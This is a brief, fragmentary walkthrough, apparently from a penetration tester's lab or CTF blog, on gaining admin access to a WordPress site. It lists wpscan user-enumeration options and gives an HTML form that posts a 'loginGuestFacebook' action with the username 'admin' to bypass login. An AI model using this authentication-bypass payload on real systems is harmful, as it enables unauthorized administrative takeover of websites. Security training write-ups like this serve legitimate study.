Privilege Escalation - Hello Admin

Vulnerable Code
  1. Use the wpscan tool to check for the out-dated plugins, themes, default credentials etc.
  • --disable-tls-check : disables SSL/TLS certificate verification
  • --enumerate u : to enumerate the users
WordPress Scan
Default Username
<form method="post" action="">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="EMAIL">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
Then go to admin panel.
Python HTTP Server
Logged In as Admin



Jerry Shah (Jerry)

|Penetration Tester| |Hack The Box| |Digital Forensics| |Malware Analysis|